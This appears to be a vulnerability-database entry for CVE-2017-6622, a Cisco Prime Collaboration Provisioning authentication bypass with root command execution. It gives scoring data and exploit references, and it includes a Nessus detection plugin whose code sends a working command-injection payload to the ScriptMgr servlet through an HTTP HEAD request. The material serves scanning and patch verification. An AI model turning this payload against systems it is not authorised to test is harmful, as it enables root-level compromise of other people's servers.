Vulnerabilities > CVE-2017-6622 - Missing Authorization vulnerability in Cisco Prime Collaboration Provisioning

047910
CVSS 9.8 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
HIGH
Integrity impact
HIGH
Availability impact
HIGH
network
low complexity
cisco
CWE-862
critical
nessus
exploit available
NVD
Published: 2017-05-18
Updated: 2019-10-03

Summary

A vulnerability in the web interface for Cisco Prime Collaboration Provisioning could allow an unauthenticated, remote attacker to bypass authentication and perform command injection with root privileges. The vulnerability is due to missing security constraints in certain HTTP request methods, which could allow access to files via the web interface. An attacker could exploit this vulnerability by sending a crafted HTTP request to the targeted application. This vulnerability affects Cisco Prime Collaboration Provisioning Software Releases prior to 12.1. Cisco Bug IDs: CSCvc98724.

Vulnerable Configurations

Part Description Count
Application
Cisco
10

Common Weakness Enumeration (CWE)

Exploit-Db

descriptionCisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution. CVE-2017-6622. Remote exploit for Hardware platform
fileexploits/hardware/remote/42888.sh
idEDB-ID:42888
last seen2017-09-29
modified2017-09-27
platformhardware
port
published2017-09-27
reporterExploit-DB
sourcehttps://www.exploit-db.com/download/42888/
titleCisco Prime Collaboration Provisioning < 12.1 - Authentication Bypass / Remote Code Execution
typeremote

Nessus

  • NASL familyCISCO
    NASL idCISCO_PRIME_CP_CVE-2017-6622.NASL
    descriptionThe remote Cisco Prime Collaboration Provisioning server is affected by a remote command execution vulnerability in the ScriptMgr servlet due to a failure to restrict the HTTP HEAD method. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands with root privileges. Note that the remote Cisco Prime Collaboration Provisioning server is reportedly affected by additional vulnerabilities; however, Nessus has not tested for these.
    last seen2020-06-01
    modified2020-06-02
    plugin id101531
    published2017-07-13
    reporterThis script is Copyright (C) 2017-2019 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/101531
    titleCisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE
    code
    #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(101531);
  script_version("1.6");
  script_cvs_date("Date: 2019/03/06 18:38:55");

  script_cve_id("CVE-2017-6622");
  script_bugtraq_id(98520);
  script_xref(name:"CISCO-BUG-ID", value:"CSCvc98724");
  script_xref(name:"CISCO-SA", value:"cisco-sa-20170517-pcp1");
  script_xref(name:"ZDI", value:"ZDI-17-445");

  script_name(english:"Cisco Prime Collaboration Provisioning ScriptMgr Servlet Authentication Bypass RCE");
  script_summary(english:"Attempts to perform a remote command injection.");

  script_set_attribute(attribute:"synopsis", value:
"The remote network management server is affected by a remote command
execution vulnerability.");
  script_set_attribute(attribute:"description", value:
"The remote Cisco Prime Collaboration Provisioning server is affected
by a remote command execution vulnerability in the ScriptMgr servlet
due to a failure to restrict the HTTP HEAD method. An unauthenticated,
remote attacker can exploit this to bypass authentication and execute
arbitrary commands with root privileges.

Note that the remote Cisco Prime Collaboration Provisioning server is
reportedly affected by additional vulnerabilities; however, Nessus has
not tested for these.");
  # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170517-pcp1
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e00b5d5b");
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-17-445/");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Cisco Prime Collaboration Provisioning version 12.1 or
later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
  script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2017/05/17");
  script_set_attribute(attribute:"patch_publication_date", value:"2017/05/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2017/07/13");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration_provisioning");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:prime_collaboration");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CISCO");

  script_copyright(english:"This script is Copyright (C) 2017-2019 Tenable Network Security, Inc.");

  script_dependencies("cisco_prime_collaboration_provisioning_detect.nbin");
  script_require_keys("Host/Cisco/PrimeCollaborationProvisioning/version");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Make sure pcp is detected
get_kb_item_or_exit("Host/Cisco/PrimeCollaborationProvisioning/version");

port = get_http_port(default:443);

# Vulnerable ScriptMgr servlet is reached through mod_jk 
banner = get_http_banner(port:port);
if (banner !~ "Server:.*Apache.*mod_jk")
{
  audit(AUDIT_LISTEN_NOT_VULN, "Web server", port);
}

pat = SCRIPT_NAME;
if(strlen(pat) > 16)
  pat = substr(pat, 0, 15);
  
cmd = "ping%20-c%2010%20" + "-p%20" + hexstr(pat) + "%20" + compat::this_host();
qs = 'command=compile&language=bsh&script=foo&scripttext=Runtime.getRuntime().exec("' + cmd + '");';
uri = "/cupm/ScriptMgr?" + qs;
method = "HEAD";
res = http_send_recv3(
  method        : method,
  item          : uri,
  port          : port,
  exit_on_fail  : TRUE
);

if(res[0] =~ "^HTTP/[0-9]\.[0-9] 200")
{
  filter = "icmp and src " + get_host_ip() + " and dst " + compat::this_host()  +
    " and icmp[icmptype] = icmp-echo";
  bpf = bpf_open(filter);
  if(isnull(bpf)) audit(AUDIT_FN_FAIL, "bpf_open");

  timeout = 5;
  t  = unixtime();
  repeat
  {
    frame = bpf_next(bpf:bpf);
    # ping back seen: cmd injection succeeded !
    if (frame && pat >< frame)
    {
      vuln = TRUE; 
      break; 
    }  
  }until(unixtime() - t > timeout);

  bpf_close(bpf);
}

if(vuln)
{
  req = http_last_sent_request(); 
  security_report_v4(
    port        : port,
    severity    : SECURITY_HOLE,
    generic     : TRUE,
    request     : make_list(req)
  );
}
else
{
  audit(AUDIT_LISTEN_NOT_VULN, "Web server", port);
}
  • NASL familyCISCO
    NASL idCISCO_PRIME_CP_SA-20170517-PCP1.NASL
    descriptionAccording to its self-reported version number, the remote Cisco Prime Collaboration Provisioning server is 9.x, 10.x, 11.x, or 12.x prior to 12.1. It is, therefore, affected by multiple vulnerabilities : - An information disclosure vulnerability exists in the web interface when handling HTTP requests. An unauthenticated, remote attacker can exploit this, via a specially crafted request, to disclose sensitive information about the application, such as user credentials. (CVE-2017-6621) - An authentication bypass vulnerability exists in the web interface due to missing security restraints in certain HTTP request methods that could allow accessing files. An unauthenticated, remote attacker can exploit this, via a specially crafted HTTP request, to bypass authentication and execute arbitrary commands with root privileges. (CVE-2017-6622) - A flaw exists in the web interface that allows directory traversal outside of a restricted path due to improper validation of HTTP requests and a failure to apply role-based access controls (RBACs) to requested HTTP URLs. An authenticated, remote attacker can exploit this, via a specially crafted request that uses path traversal, to delete arbitrary files from the system. (CVE-2017-6635) Note that Nessus has not tested for these issues but has instead relied only on the application
    last seen2020-06-01
    modified2020-06-02
    plugin id100323
    published2017-05-22
    reporterThis script is Copyright (C) 2017-2018 Tenable Network Security, Inc.
    sourcehttps://www.tenable.com/plugins/nessus/100323
    titleCisco Prime Collaboration Provisioning < 12.1 Multiple Vulnerabilities (cisco-sa-20170517-pcp1 - cisco-sa-20170517-pcp3)

Packetstorm

data sourcehttps://packetstormsecurity.com/files/download/144420/cpcp-bypassexec.txt
idPACKETSTORM:144420
last seen2017-09-30
published2017-09-29
reporterAdam Brown
sourcehttps://packetstormsecurity.com/files/144420/Cisco-Prime-Collaboration-Provisioning-Authentication-Bypass-Code-Execution.html
titleCisco Prime Collaboration Provisioning Authentication Bypass / Code Execution

Saint

bid98520
descriptionCisco Prime Collaboration Provisioning ScriptMgr HEAD request vulnerability
idnet_cisco_primecollaboration
titlecisco_prime_cp_scriptmgr_head
typeremote

References